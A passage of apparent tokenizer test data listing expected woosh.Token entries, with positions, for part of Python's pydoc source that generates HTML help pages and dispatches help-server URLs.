woosh.Token(woosh.NEWLINE, '\r\n', 2598, 13, 2599, 0),
woosh.Token(woosh.INDENT, ' ', 2599, 0, 2599, 12),
woosh.Token(woosh.NAME, 'title', 2599, 12, 2599, 17),
woosh.Token(woosh.OP, '=', 2599, 18, 2599, 19),
woosh.Token(woosh.STRING, "'TOPIC'", 2599, 20, 2599, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2599, 27, 2600, 0),
woosh.Token(woosh.DEDENT, ' ', 2600, 0, 2600, 8),
woosh.Token(woosh.NAME, 'heading', 2600, 8, 2600, 15),
woosh.Token(woosh.OP, '=', 2600, 16, 2600, 17),
woosh.Token(woosh.NAME, 'html', 2600, 18, 2600, 22),
woosh.Token(woosh.OP, '.', 2600, 22, 2600, 23),
woosh.Token(woosh.NAME, 'heading', 2600, 23, 2600, 30),
woosh.Token(woosh.OP, '(', 2600, 30, 2600, 31),
woosh.Token(woosh.STRING, "'<big><big><strong>%s</strong></big></big>'", 2601, 12, 2601, 55),
woosh.Token(woosh.OP, '%', 2601, 56, 2601, 57),
woosh.Token(woosh.NAME, 'title', 2601, 58, 2601, 63),
woosh.Token(woosh.OP, ',', 2601, 63, 2601, 64),
woosh.Token(woosh.STRING, "'#ffffff'", 2602, 12, 2602, 21),
woosh.Token(woosh.OP, ',', 2602, 21, 2602, 22),
woosh.Token(woosh.STRING, "'#7799ee'", 2602, 23, 2602, 32),
woosh.Token(woosh.OP, ')', 2602, 32, 2602, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2602, 33, 2603, 0),
woosh.Token(woosh.NAME, 'contents', 2603, 8, 2603, 16),
woosh.Token(woosh.OP, '=', 2603, 17, 2603, 18),
woosh.Token(woosh.STRING, "'<pre>%s</pre>'", 2603, 19, 2603, 34),
woosh.Token(woosh.OP, '%', 2603, 35, 2603, 36),
woosh.Token(woosh.NAME, 'html', 2603, 37, 2603, 41),
woosh.Token(woosh.OP, '.', 2603, 41, 2603, 42),
woosh.Token(woosh.NAME, 'markup', 2603, 42, 2603, 48),
woosh.Token(woosh.OP, '(', 2603, 48, 2603, 49),
woosh.Token(woosh.NAME, 'contents', 2603, 49, 2603, 57),
woosh.Token(woosh.OP, ')', 2603, 57, 2603, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 2603, 58, 2604, 0),
woosh.Token(woosh.NAME, 'contents', 2604, 8, 2604, 16),
woosh.Token(woosh.OP, '=', 2604, 17, 2604, 18),
woosh.Token(woosh.NAME, 'html', 2604, 19, 2604, 23),
woosh.Token(woosh.OP, '.', 2604, 23, 2604, 24),
woosh.Token(woosh.NAME, 'bigsection', 2604, 24, 2604, 34),
woosh.Token(woosh.OP, '(', 2604, 34, 2604, 35),
woosh.Token(woosh.NAME, 'topic', 2604, 35, 2604, 40),
woosh.Token(woosh.OP, ',', 2604, 41, 2604, 42),
woosh.Token(woosh.STRING, "'#ffffff'", 2604, 43, 2604, 52),
woosh.Token(woosh.OP, ',', 2604, 52, 2604, 53),
woosh.Token(woosh.STRING, "'#ee77aa'", 2604, 53, 2604, 62),
woosh.Token(woosh.OP, ',', 2604, 62, 2604, 63),
woosh.Token(woosh.NAME, 'contents', 2604, 64, 2604, 72),
woosh.Token(woosh.OP, ')', 2604, 72, 2604, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 2604, 73, 2605, 0),
woosh.Token(woosh.NAME, 'if', 2605, 8, 2605, 10),
woosh.Token(woosh.NAME, 'xrefs', 2605, 11, 2605, 16),
woosh.Token(woosh.OP, ':', 2605, 16, 2605, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2605, 17, 2606, 0),
woosh.Token(woosh.INDENT, ' ', 2606, 0, 2606, 12),
woosh.Token(woosh.NAME, 'xrefs', 2606, 12, 2606, 17),
woosh.Token(woosh.OP, '=', 2606, 18, 2606, 19),
woosh.Token(woosh.NAME, 'sorted', 2606, 20, 2606, 26),
woosh.Token(woosh.OP, '(', 2606, 26, 2606, 27),
woosh.Token(woosh.NAME, 'xrefs', 2606, 27, 2606, 32),
woosh.Token(woosh.OP, '.', 2606, 32, 2606, 33),
woosh.Token(woosh.NAME, 'split', 2606, 33, 2606, 38),
woosh.Token(woosh.OP, '(', 2606, 38, 2606, 39),
woosh.Token(woosh.OP, ')', 2606, 39, 2606, 40),
woosh.Token(woosh.OP, ')', 2606, 40, 2606, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2606, 41, 2607, 0),
woosh.Token(woosh.NAME, 'def', 2608, 12, 2608, 15),
woosh.Token(woosh.NAME, 'bltinlink', 2608, 16, 2608, 25),
woosh.Token(woosh.OP, '(', 2608, 25, 2608, 26),
woosh.Token(woosh.NAME, 'name', 2608, 26, 2608, 30),
woosh.Token(woosh.OP, ')', 2608, 30, 2608, 31),
woosh.Token(woosh.OP, ':', 2608, 31, 2608, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2608, 32, 2609, 0),
woosh.Token(woosh.INDENT, ' ', 2609, 0, 2609, 16),
woosh.Token(woosh.NAME, 'return', 2609, 16, 2609, 22),
woosh.Token(woosh.STRING, '\'<a href="topic?key=%s">%s</a>\'', 2609, 23, 2609, 54),
woosh.Token(woosh.OP, '%', 2609, 55, 2609, 56),
woosh.Token(woosh.OP, '(', 2609, 57, 2609, 58),
woosh.Token(woosh.NAME, 'name', 2609, 58, 2609, 62),
woosh.Token(woosh.OP, ',', 2609, 62, 2609, 63),
woosh.Token(woosh.NAME, 'name', 2609, 64, 2609, 68),
woosh.Token(woosh.OP, ')', 2609, 68, 2609, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 2609, 69, 2610, 0),
woosh.Token(woosh.DEDENT, ' ', 2611, 0, 2611, 12),
woosh.Token(woosh.NAME, 'xrefs', 2611, 12, 2611, 17),
woosh.Token(woosh.OP, '=', 2611, 18, 2611, 19),
woosh.Token(woosh.NAME, 'html', 2611, 20, 2611, 24),
woosh.Token(woosh.OP, '.', 2611, 24, 2611, 25),
woosh.Token(woosh.NAME, 'multicolumn', 2611, 25, 2611, 36),
woosh.Token(woosh.OP, '(', 2611, 36, 2611, 37),
woosh.Token(woosh.NAME, 'xrefs', 2611, 37, 2611, 42),
woosh.Token(woosh.OP, ',', 2611, 42, 2611, 43),
woosh.Token(woosh.NAME, 'bltinlink', 2611, 44, 2611, 53),
woosh.Token(woosh.OP, ')', 2611, 53, 2611, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 2611, 54, 2612, 0),
woosh.Token(woosh.NAME, 'xrefs', 2612, 12, 2612, 17),
woosh.Token(woosh.OP, '=', 2612, 18, 2612, 19),
woosh.Token(woosh.NAME, 'html', 2612, 20, 2612, 24),
woosh.Token(woosh.OP, '.', 2612, 24, 2612, 25),
woosh.Token(woosh.NAME, 'section', 2612, 25, 2612, 32),
woosh.Token(woosh.OP, '(', 2612, 32, 2612, 33),
woosh.Token(woosh.STRING, "'Related help topics: '", 2612, 33, 2612, 56),
woosh.Token(woosh.OP, ',', 2612, 56, 2612, 57),
woosh.Token(woosh.STRING, "'#ffffff'", 2613, 33, 2613, 42),
woosh.Token(woosh.OP, ',', 2613, 42, 2613, 43),
woosh.Token(woosh.STRING, "'#ee77aa'", 2613, 44, 2613, 53),
woosh.Token(woosh.OP, ',', 2613, 53, 2613, 54),
woosh.Token(woosh.NAME, 'xrefs', 2613, 55, 2613, 60),
woosh.Token(woosh.OP, ')', 2613, 60, 2613, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 2613, 61, 2614, 0),
woosh.Token(woosh.DEDENT, ' ', 2614, 0, 2614, 8),
woosh.Token(woosh.NAME, 'return', 2614, 8, 2614, 14),
woosh.Token(woosh.OP, '(', 2614, 15, 2614, 16),
woosh.Token(woosh.STRING, "'%s %s'", 2614, 16, 2614, 23),
woosh.Token(woosh.OP, '%', 2614, 24, 2614, 25),
woosh.Token(woosh.OP, '(', 2614, 26, 2614, 27),
woosh.Token(woosh.NAME, 'title', 2614, 27, 2614, 32),
woosh.Token(woosh.OP, ',', 2614, 32, 2614, 33),
woosh.Token(woosh.NAME, 'topic', 2614, 34, 2614, 39),
woosh.Token(woosh.OP, ')', 2614, 39, 2614, 40),
woosh.Token(woosh.OP, ',', 2614, 40, 2614, 41),
woosh.Token(woosh.STRING, "''", 2615, 16, 2615, 18),
woosh.Token(woosh.OP, '.', 2615, 18, 2615, 19),
woosh.Token(woosh.NAME, 'join', 2615, 19, 2615, 23),
woosh.Token(woosh.OP, '(', 2615, 23, 2615, 24),
woosh.Token(woosh.OP, '(', 2615, 24, 2615, 25),
woosh.Token(woosh.NAME, 'heading', 2615, 25, 2615, 32),
woosh.Token(woosh.OP, ',', 2615, 32, 2615, 33),
woosh.Token(woosh.NAME, 'contents', 2615, 34, 2615, 42),
woosh.Token(woosh.OP, ',', 2615, 42, 2615, 43),
woosh.Token(woosh.NAME, 'xrefs', 2615, 44, 2615, 49),
woosh.Token(woosh.OP, ')', 2615, 49, 2615, 50),
woosh.Token(woosh.OP, ')', 2615, 50, 2615, 51),
woosh.Token(woosh.OP, ')', 2615, 51, 2615, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 2615, 52, 2616, 0),
woosh.Token(woosh.DEDENT, ' ', 2617, 0, 2617, 4),
woosh.Token(woosh.NAME, 'def', 2617, 4, 2617, 7),
woosh.Token(woosh.NAME, 'html_getobj', 2617, 8, 2617, 19),
woosh.Token(woosh.OP, '(', 2617, 19, 2617, 20),
woosh.Token(woosh.NAME, 'url', 2617, 20, 2617, 23),
woosh.Token(woosh.OP, ')', 2617, 23, 2617, 24),
woosh.Token(woosh.OP, ':', 2617, 24, 2617, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2617, 25, 2618, 0),
woosh.Token(woosh.INDENT, ' ', 2618, 0, 2618, 8),
woosh.Token(woosh.NAME, 'obj', 2618, 8, 2618, 11),
woosh.Token(woosh.OP, '=', 2618, 12, 2618, 13),
woosh.Token(woosh.NAME, 'locate', 2618, 14, 2618, 20),
woosh.Token(woosh.OP, '(', 2618, 20, 2618, 21),
woosh.Token(woosh.NAME, 'url', 2618, 21, 2618, 24),
woosh.Token(woosh.OP, ',', 2618, 24, 2618, 25),
woosh.Token(woosh.NAME, 'forceload', 2618, 26, 2618, 35),
woosh.Token(woosh.OP, '=', 2618, 35, 2618, 36),
woosh.Token(woosh.NUMBER, '1', 2618, 36, 2618, 37),
woosh.Token(woosh.OP, ')', 2618, 37, 2618, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2618, 38, 2619, 0),
woosh.Token(woosh.NAME, 'if', 2619, 8, 2619, 10),
woosh.Token(woosh.NAME, 'obj', 2619, 11, 2619, 14),
woosh.Token(woosh.NAME, 'is', 2619, 15, 2619, 17),
woosh.Token(woosh.NAME, 'None', 2619, 18, 2619, 22),
woosh.Token(woosh.NAME, 'and', 2619, 23, 2619, 26),
woosh.Token(woosh.NAME, 'url', 2619, 27, 2619, 30),
woosh.Token(woosh.OP, '!=', 2619, 31, 2619, 33),
woosh.Token(woosh.STRING, "'None'", 2619, 34, 2619, 40),
woosh.Token(woosh.OP, ':', 2619, 40, 2619, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2619, 41, 2620, 0),
woosh.Token(woosh.INDENT, ' ', 2620, 0, 2620, 12),
woosh.Token(woosh.NAME, 'raise', 2620, 12, 2620, 17),
woosh.Token(woosh.NAME, 'ValueError', 2620, 18, 2620, 28),
woosh.Token(woosh.OP, '(', 2620, 28, 2620, 29),
woosh.Token(woosh.STRING, "'could not find object'", 2620, 29, 2620, 52),
woosh.Token(woosh.OP, ')', 2620, 52, 2620, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2620, 53, 2621, 0),
woosh.Token(woosh.DEDENT, ' ', 2621, 0, 2621, 8),
woosh.Token(woosh.NAME, 'title', 2621, 8, 2621, 13),
woosh.Token(woosh.OP, '=', 2621, 14, 2621, 15),
woosh.Token(woosh.NAME, 'describe', 2621, 16, 2621, 24),
woosh.Token(woosh.OP, '(', 2621, 24, 2621, 25),
woosh.Token(woosh.NAME, 'obj', 2621, 25, 2621, 28),
woosh.Token(woosh.OP, ')', 2621, 28, 2621, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2621, 29, 2622, 0),
woosh.Token(woosh.NAME, 'content', 2622, 8, 2622, 15),
woosh.Token(woosh.OP, '=', 2622, 16, 2622, 17),
woosh.Token(woosh.NAME, 'html', 2622, 18, 2622, 22),
woosh.Token(woosh.OP, '.', 2622, 22, 2622, 23),
woosh.Token(woosh.NAME, 'document', 2622, 23, 2622, 31),
woosh.Token(woosh.OP, '(', 2622, 31, 2622, 32),
woosh.Token(woosh.NAME, 'obj', 2622, 32, 2622, 35),
woosh.Token(woosh.OP, ',', 2622, 35, 2622, 36),
woosh.Token(woosh.NAME, 'url', 2622, 37, 2622, 40),
woosh.Token(woosh.OP, ')', 2622, 40, 2622, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2622, 41, 2623, 0),
woosh.Token(woosh.NAME, 'return', 2623, 8, 2623, 14),
woosh.Token(woosh.NAME, 'title', 2623, 15, 2623, 20),
woosh.Token(woosh.OP, ',', 2623, 20, 2623, 21),
woosh.Token(woosh.NAME, 'content', 2623, 22, 2623, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2623, 29, 2624, 0),
woosh.Token(woosh.DEDENT, ' ', 2625, 0, 2625, 4),
woosh.Token(woosh.NAME, 'def', 2625, 4, 2625, 7),
woosh.Token(woosh.NAME, 'html_error', 2625, 8, 2625, 18),
woosh.Token(woosh.OP, '(', 2625, 18, 2625, 19),
woosh.Token(woosh.NAME, 'url', 2625, 19, 2625, 22),
woosh.Token(woosh.OP, ',', 2625, 22, 2625, 23),
woosh.Token(woosh.NAME, 'exc', 2625, 24, 2625, 27),
woosh.Token(woosh.OP, ')', 2625, 27, 2625, 28),
woosh.Token(woosh.OP, ':', 2625, 28, 2625, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2625, 29, 2626, 0),
woosh.Token(woosh.INDENT, ' ', 2626, 0, 2626, 8),
woosh.Token(woosh.NAME, 'heading', 2626, 8, 2626, 15),
woosh.Token(woosh.OP, '=', 2626, 16, 2626, 17),
woosh.Token(woosh.NAME, 'html', 2626, 18, 2626, 22),
woosh.Token(woosh.OP, '.', 2626, 22, 2626, 23),
woosh.Token(woosh.NAME, 'heading', 2626, 23, 2626, 30),
woosh.Token(woosh.OP, '(', 2626, 30, 2626, 31),
woosh.Token(woosh.STRING, "'<big><big><strong>Error</strong></big></big>'", 2627, 12, 2627, 58),
woosh.Token(woosh.OP, ',', 2627, 58, 2627, 59),
woosh.Token(woosh.STRING, "'#ffffff'", 2628, 12, 2628, 21),
woosh.Token(woosh.OP, ',', 2628, 21, 2628, 22),
woosh.Token(woosh.STRING, "'#7799ee'", 2628, 23, 2628, 32),
woosh.Token(woosh.OP, ')', 2628, 32, 2628, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2628, 33, 2629, 0),
woosh.Token(woosh.NAME, 'contents', 2629, 8, 2629, 16),
woosh.Token(woosh.OP, '=', 2629, 17, 2629, 18),
woosh.Token(woosh.STRING, "'<br>'", 2629, 19, 2629, 25),
woosh.Token(woosh.OP, '.', 2629, 25, 2629, 26),
woosh.Token(woosh.NAME, 'join', 2629, 26, 2629, 30),
woosh.Token(woosh.OP, '(', 2629, 30, 2629, 31),
woosh.Token(woosh.NAME, 'html', 2629, 31, 2629, 35),
woosh.Token(woosh.OP, '.', 2629, 35, 2629, 36),
woosh.Token(woosh.NAME, 'escape', 2629, 36, 2629, 42),
woosh.Token(woosh.OP, '(', 2629, 42, 2629, 43),
woosh.Token(woosh.NAME, 'line', 2629, 43, 2629, 47),
woosh.Token(woosh.OP, ')', 2629, 47, 2629, 48),
woosh.Token(woosh.NAME, 'for', 2629, 49, 2629, 52),
woosh.Token(woosh.NAME, 'line', 2629, 53, 2629, 57),
woosh.Token(woosh.NAME, 'in', 2629, 58, 2629, 60),
woosh.Token(woosh.NAME, 'format_exception_only', 2630, 31, 2630, 52),
woosh.Token(woosh.OP, '(', 2630, 52, 2630, 53),
woosh.Token(woosh.NAME, 'type', 2630, 53, 2630, 57),
woosh.Token(woosh.OP, '(', 2630, 57, 2630, 58),
woosh.Token(woosh.NAME, 'exc', 2630, 58, 2630, 61),
woosh.Token(woosh.OP, ')', 2630, 61, 2630, 62),
woosh.Token(woosh.OP, ',', 2630, 62, 2630, 63),
woosh.Token(woosh.NAME, 'exc', 2630, 64, 2630, 67),
woosh.Token(woosh.OP, ')', 2630, 67, 2630, 68),
woosh.Token(woosh.OP, ')', 2630, 68, 2630, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 2630, 69, 2631, 0),
woosh.Token(woosh.NAME, 'contents', 2631, 8, 2631, 16),
woosh.Token(woosh.OP, '=', 2631, 17, 2631, 18),
woosh.Token(woosh.NAME, 'heading', 2631, 19, 2631, 26),
woosh.Token(woosh.OP, '+', 2631, 27, 2631, 28),
woosh.Token(woosh.NAME, 'html', 2631, 29, 2631, 33),
woosh.Token(woosh.OP, '.', 2631, 33, 2631, 34),
woosh.Token(woosh.NAME, 'bigsection', 2631, 34, 2631, 44),
woosh.Token(woosh.OP, '(', 2631, 44, 2631, 45),
woosh.Token(woosh.NAME, 'url', 2631, 45, 2631, 48),
woosh.Token(woosh.OP, ',', 2631, 48, 2631, 49),
woosh.Token(woosh.STRING, "'#ffffff'", 2631, 50, 2631, 59),
woosh.Token(woosh.OP, ',', 2631, 59, 2631, 60),
woosh.Token(woosh.STRING, "'#bb0000'", 2631, 61, 2631, 70),
woosh.Token(woosh.OP, ',', 2631, 70, 2631, 71),
woosh.Token(woosh.NAME, 'contents', 2632, 45, 2632, 53),
woosh.Token(woosh.OP, ')', 2632, 53, 2632, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 2632, 54, 2633, 0),
woosh.Token(woosh.NAME, 'return', 2633, 8, 2633, 14),
woosh.Token(woosh.STRING, '"Error - %s"', 2633, 15, 2633, 27),
woosh.Token(woosh.OP, '%', 2633, 28, 2633, 29),
woosh.Token(woosh.NAME, 'url', 2633, 30, 2633, 33),
woosh.Token(woosh.OP, ',', 2633, 33, 2633, 34),
woosh.Token(woosh.NAME, 'contents', 2633, 35, 2633, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 2633, 43, 2634, 0),
woosh.Token(woosh.DEDENT, ' ', 2635, 0, 2635, 4),
woosh.Token(woosh.NAME, 'def', 2635, 4, 2635, 7),
woosh.Token(woosh.NAME, 'get_html_page', 2635, 8, 2635, 21),
woosh.Token(woosh.OP, '(', 2635, 21, 2635, 22),
woosh.Token(woosh.NAME, 'url', 2635, 22, 2635, 25),
woosh.Token(woosh.OP, ')', 2635, 25, 2635, 26),
woosh.Token(woosh.OP, ':', 2635, 26, 2635, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2635, 27, 2636, 0),
woosh.Token(woosh.INDENT, ' ', 2636, 0, 2636, 8),
woosh.Token(woosh.STRING, '"""Generate an HTML page for url."""', 2636, 8, 2636, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2636, 44, 2637, 0),
woosh.Token(woosh.NAME, 'complete_url', 2637, 8, 2637, 20),
woosh.Token(woosh.OP, '=', 2637, 21, 2637, 22),
woosh.Token(woosh.NAME, 'url', 2637, 23, 2637, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 2637, 26, 2638, 0),
woosh.Token(woosh.NAME, 'if', 2638, 8, 2638, 10),
woosh.Token(woosh.NAME, 'url', 2638, 11, 2638, 14),
woosh.Token(woosh.OP, '.', 2638, 14, 2638, 15),
woosh.Token(woosh.NAME, 'endswith', 2638, 15, 2638, 23),
woosh.Token(woosh.OP, '(', 2638, 23, 2638, 24),
woosh.Token(woosh.STRING, "'.html'", 2638, 24, 2638, 31),
woosh.Token(woosh.OP, ')', 2638, 31, 2638, 32),
woosh.Token(woosh.OP, ':', 2638, 32, 2638, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2638, 33, 2639, 0),
woosh.Token(woosh.INDENT, ' ', 2639, 0, 2639, 12),
woosh.Token(woosh.NAME, 'url', 2639, 12, 2639, 15),
woosh.Token(woosh.OP, '=', 2639, 16, 2639, 17),
woosh.Token(woosh.NAME, 'url', 2639, 18, 2639, 21),
woosh.Token(woosh.OP, '[', 2639, 21, 2639, 22),
woosh.Token(woosh.OP, ':', 2639, 22, 2639, 23),
woosh.Token(woosh.OP, '-', 2639, 23, 2639, 24),
woosh.Token(woosh.NUMBER, '5', 2639, 24, 2639, 25),
woosh.Token(woosh.OP, ']', 2639, 25, 2639, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 2639, 26, 2640, 0),
woosh.Token(woosh.DEDENT, ' ', 2640, 0, 2640, 8),
woosh.Token(woosh.NAME, 'try', 2640, 8, 2640, 11),
woosh.Token(woosh.OP, ':', 2640, 11, 2640, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 2640, 12, 2641, 0),
woosh.Token(woosh.INDENT, ' ', 2641, 0, 2641, 12),
woosh.Token(woosh.NAME, 'if', 2641, 12, 2641, 14),
woosh.Token(woosh.NAME, 'url', 2641, 15, 2641, 18),
woosh.Token(woosh.NAME, 'in', 2641, 19, 2641, 21),
woosh.Token(woosh.OP, '(', 2641, 22, 2641, 23),
woosh.Token(woosh.STRING, '""', 2641, 23, 2641, 25),
woosh.Token(woosh.OP, ',', 2641, 25, 2641, 26),
woosh.Token(woosh.STRING, '"index"', 2641, 27, 2641, 34),
woosh.Token(woosh.OP, ')', 2641, 34, 2641, 35),
woosh.Token(woosh.OP, ':', 2641, 35, 2641, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2641, 36, 2642, 0),
woosh.Token(woosh.INDENT, ' ', 2642, 0, 2642, 16),
woosh.Token(woosh.NAME, 'title', 2642, 16, 2642, 21),
woosh.Token(woosh.OP, ',', 2642, 21, 2642, 22),
woosh.Token(woosh.NAME, 'content', 2642, 23, 2642, 30),
woosh.Token(woosh.OP, '=', 2642, 31, 2642, 32),
woosh.Token(woosh.NAME, 'html_index', 2642, 33, 2642, 43),
woosh.Token(woosh.OP, '(', 2642, 43, 2642, 44),
woosh.Token(woosh.OP, ')', 2642, 44, 2642, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 2642, 45, 2643, 0),
woosh.Token(woosh.DEDENT, ' ', 2643, 0, 2643, 12),
woosh.Token(woosh.NAME, 'elif', 2643, 12, 2643, 16),
woosh.Token(woosh.NAME, 'url', 2643, 17, 2643, 20),
woosh.Token(woosh.OP, '==', 2643, 21, 2643, 23),
woosh.Token(woosh.STRING, '"topics"', 2643, 24, 2643, 32),
woosh.Token(woosh.OP, ':', 2643, 32, 2643, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2643, 33, 2644, 0),
woosh.Token(woosh.INDENT, ' ', 2644, 0, 2644, 16),
woosh.Token(woosh.NAME, 'title', 2644, 16, 2644, 21),
woosh.Token(woosh.OP, ',', 2644, 21, 2644, 22),
woosh.Token(woosh.NAME, 'content', 2644, 23, 2644, 30),
woosh.Token(woosh.OP, '=', 2644, 31, 2644, 32),
woosh.Token(woosh.NAME, 'html_topics', 2644, 33, 2644, 44),
woosh.Token(woosh.OP, '(', 2644, 44, 2644, 45),
woosh.Token(woosh.OP, ')', 2644, 45, 2644, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2644, 46, 2645, 0),
woosh.Token(woosh.DEDENT, ' ', 2645, 0, 2645, 12),
woosh.Token(woosh.NAME, 'elif', 2645, 12, 2645, 16),
woosh.Token(woosh.NAME, 'url', 2645, 17, 2645, 20),
woosh.Token(woosh.OP, '==', 2645, 21, 2645, 23),
woosh.Token(woosh.STRING, '"keywords"', 2645, 24, 2645, 34),
woosh.Token(woosh.OP, ':', 2645, 34, 2645, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2645, 35, 2646, 0),
woosh.Token(woosh.INDENT, ' ', 2646, 0, 2646, 16),
woosh.Token(woosh.NAME, 'title', 2646, 16, 2646, 21),
woosh.Token(woosh.OP, ',', 2646, 21, 2646, 22),
woosh.Token(woosh.NAME, 'content', 2646, 23, 2646, 30),
woosh.Token(woosh.OP, '=', 2646, 31, 2646, 32),
woosh.Token(woosh.NAME, 'html_keywords', 2646, 33, 2646, 46),
woosh.Token(woosh.OP, '(', 2646, 46, 2646, 47),
woosh.Token(woosh.OP, ')', 2646, 47, 2646, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 2646, 48, 2647, 0),
woosh.Token(woosh.DEDENT, ' ', 2647, 0, 2647, 12),
woosh.Token(woosh.NAME, 'elif', 2647, 12, 2647, 16),
woosh.Token(woosh.STRING, "'='", 2647, 17, 2647, 20),
woosh.Token(woosh.NAME, 'in', 2647, 21, 2647, 23),
woosh.Token(woosh.NAME, 'url', 2647, 24, 2647, 27),
woosh.Token(woosh.OP, ':', 2647, 27, 2647, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2647, 28, 2648, 0),
woosh.Token(woosh.INDENT, ' ', 2648, 0, 2648, 16),
woosh.Token(woosh.NAME, 'op', 2648, 16, 2648, 18),
woosh.Token(woosh.OP, ',', 2648, 18, 2648, 19),
woosh.Token(woosh.NAME, '_', 2648, 20, 2648, 21),
woosh.Token(woosh.OP, ',', 2648, 21, 2648, 22),
woosh.Token(woosh.NAME, 'url', 2648, 23, 2648, 26),
woosh.Token(woosh.OP, '=', 2648, 27, 2648, 28),
woosh.Token(woosh.NAME, 'url', 2648, 29, 2648, 32),
woosh.Token(woosh.OP, '.', 2648, 32, 2648, 33),
woosh.Token(woosh.NAME, 'partition', 2648, 33, 2648, 42),
woosh.Token(woosh.OP, '(', 2648, 42, 2648, 43),
woosh.Token(woosh.STRING, "'='", 2648, 43, 2648, 46),
woosh.Token(woosh.OP, ')', 2648, 46, 2648, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 2648, 47, 2649, 0),
woosh.Token(woosh.NAME, 'if', 2649, 16, 2649, 18),
woosh.Token(woosh.NAME, 'op', 2649, 19, 2649, 21),
woosh.Token(woosh.OP, '==', 2649, 22, 2649, 24),
woosh.Token(woosh.STRING, '"search?key"', 2649, 25, 2649, 37),
woosh.Token(woosh.OP, ':', 2649, 37, 2649, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2649, 38, 2650, 0),
woosh.Token(woosh.INDENT, ' ', 2650, 0, 2650, 20),
woosh.Token(woosh.NAME, 'title', 2650, 20, 2650, 25),
woosh.Token(woosh.OP, ',', 2650, 25, 2650, 26),
woosh.Token(woosh.NAME, 'content', 2650, 27, 2650, 34),
woosh.Token(woosh.OP, '=', 2650, 35, 2650, 36),
woosh.Token(woosh.NAME, 'html_search', 2650, 37, 2650, 48),
woosh.Token(woosh.OP, '(', 2650, 48, 2650, 49),
woosh.Token(woosh.NAME, 'url', 2650, 49, 2650, 52),
woosh.Token(woosh.OP, ')', 2650, 52, 2650, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2650, 53, 2651, 0),
woosh.Token(woosh.DEDENT, ' ', 2651, 0, 2651, 16),
woosh.Token(woosh.NAME, 'elif', 2651, 16, 2651, 20),
woosh.Token(woosh.NAME, 'op', 2651, 21, 2651, 23),
woosh.Token(woosh.OP, '==', 2651, 24, 2651, 26),
woosh.Token(woosh.STRING, '"getfile?key"', 2651, 27, 2651, 40),
woosh.Token(woosh.OP, ':', 2651, 40, 2651, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2651, 41, 2652, 0),
woosh.Token(woosh.INDENT, ' ', 2652, 0, 2652, 20),
woosh.Token(woosh.NAME, 'title', 2652, 20, 2652, 25),
woosh.Token(woosh.OP, ',', 2652, 25, 2652, 26),
woosh.Token(woosh.NAME, 'content', 2652, 27, 2652, 34),
woosh.Token(woosh.OP, '=', 2652, 35, 2652, 36),
woosh.Token(woosh.NAME, 'html_getfile', 2652, 37, 2652, 49),
woosh.Token(woosh.OP, '(', 2652, 49, 2652, 50),
woosh.Token(woosh.NAME, 'url', 2652, 50, 2652, 53),
woosh.Token(woosh.OP, ')', 2652, 53, 2652, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 2652, 54, 2653, 0),
woosh.Token(woosh.DEDENT, ' ', 2653, 0, 2653, 16),
woosh.Token(woosh.NAME, 'elif', 2653, 16, 2653, 20),
woosh.Token(woosh.NAME, 'op', 2653, 21, 2653, 23),
woosh.Token(woosh.OP, '==', 2653, 24, 2653, 26),
woosh.Token(woosh.STRING, '"topic?key"', 2653, 27, 2653, 38),
woosh.Token(woosh.OP, ':', 2653, 38, 2653, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2653, 39, 2654, 0),
woosh.Token(woosh.COMMENT, '# try topics first, then objects.', 2654, 20, 2654, 53),
woosh.Token(woosh.INDENT, ' ', 2655, 0, 2655, 20),
woosh.Token(woosh.NAME, 'try', 2655, 20, 2655, 23),
woosh.Token(woosh.OP, ':', 2655, 23, 2655, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2655, 24, 2656, 0),
woosh.Token(woosh.INDENT, ' ', 2656, 0, 2656, 24),
woosh.Token(woosh.NAME, 'title', 2656, 24, 2656, 29),
woosh.Token(woosh.OP, ',', 2656, 29, 2656, 30),
woosh.Token(woosh.NAME, 'content', 2656, 31, 2656, 38),
woosh.Token(woosh.OP, '=', 2656, 39, 2656, 40),
woosh.Token(woosh.NAME, 'html_topicpage', 2656, 41, 2656, 55),
woosh.Token(woosh.OP, '(', 2656, 55, 2656, 56),
woosh.Token(woosh.NAME, 'url', 2656, 56, 2656, 59),
woosh.Token(woosh.OP, ')', 2656, 59, 2656, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 2656, 60, 2657, 0),
